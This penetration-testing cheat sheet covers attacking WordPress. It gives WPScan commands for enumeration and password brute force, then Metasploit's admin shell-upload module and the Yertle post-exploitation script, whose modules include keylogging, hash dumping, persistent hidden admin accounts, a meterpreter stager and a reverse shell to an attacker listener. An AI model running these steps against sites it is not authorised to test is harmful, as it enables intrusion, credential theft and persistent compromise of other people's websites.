WordPress is a free and open-source content management system (CMS) developed by the WordPress.org foundation and based on PHP and MySQL.
WordPress is, by far, the most popular website management system in use with a CMS market share of nearly sixty percent and used by more than 60 million websites, including 30.6% of the top 10 million websites as of April 2018.
WordPress' plugin architecture allows users to extend the features and functionality of a website or blog. As of March 2017, WordPress has over 55,286 plugins available.
WordPress default URL
The following files and directories can be found on a default installation of WordPress:
Refer to the SecLists' Discovery/Web-Content/CMS/wordpress.fuzz.txt wordlist for a more exhaustive list of URL.
WPScan
WPScan is a well-known vulnerability scanner written in Ruby for WordPress which focus on vulnerabilities in WordPress core, themes, and plugins.
The WPScan vulnerability database is public and count, as of December 2018, 11665 vulnerabilities. The database is hosted on the following host:
https://wpvulndb.com/
Usage:
# Update the WordPress Core, themes and plugins vulnerability database
wpscan --update
wpscan --url <URL>
# Enumerate installed plugins | themes | users | timthumbs
wpscan --url <URL> --enumerate < p | t | u | tt >
# Wordlist password brute force on enumerated users using 50 threads
wpscan --url <URL> --wordlist <WORDLIST_PASSWORDS> --threads 50
# Wordlist usernames and password brute force using 50 threads
wpscan <URL> [--username <USERNAME> | --usernames <WORDLIST_USERNAMES>] --wordlist <WORDLIST_PASSWORDS> --threads 50
# Multiple targets scan (all plugins, all themes, config backups, db exports, user enumeration, and password bruteforce) using using interlace.
echo 'wpscan --disable-tls-checks --rua --force --max-threads 50 -e ap,at,cb,dbe,u,m --plugins-detection aggressive --detection-mode aggressive --passwords <PASSWORD_WORDLIST> -o _output_/_cleantarget_-wpscan.txt --url _target_' > wordpress_cmd.txt
interlace -tL <WORDPRESS_HOSTS_FILE> -o <OUTPUT_DIRECTORY> -cL wordpress_cmd.txt
Administrator to RCE
The tools presented below require valid WordPress administrator credentials.
Metasploit
The Metasploit module exploit/unix/webapp/wp_admin_shell_upload can be used to generate a plugin packed with a Metasploit payload and upload it to the WordPress server.
msf> use exploit/unix/webapp/wp_admin_shell_upload
WPForce Yertle
Part of the WPForce suite of Wordpress attack tools, Yertle is a WordPress post-exploitation python script.
The following modules are implemented:
beef Injects a BeEF hook into website
dbcreds Prints the database credentials
exit Terminate the session
hashdump Dumps all WordPress password hashes
help Help menu
keylogger Patches WordPress core to log plaintext credentials
keylog Displays keylog file
meterpreter Executes a PHP meterpreter stager (php/meterpreter/reverse_tcp) to connect to metasploit
persist Creates an admin account that will re-add itself
quit Terminate the session
shell Sends a TCP reverse shell to a netcat listener
stealth Hides Yertle from the plugins page
Usage:
# Bind OS shell including the modules above
python yertle.py -u <USERNAME> -p <PASSWORD> -t <URL> -i
os-shell> help | hashdump | persist | whoami | ...
# Reverse OS shell - works with a netcat listener
python yertle.py -u <USERNAME> -p <PASSWORD> -t <URL> -r -li <LHOST> -lp <LPORT>
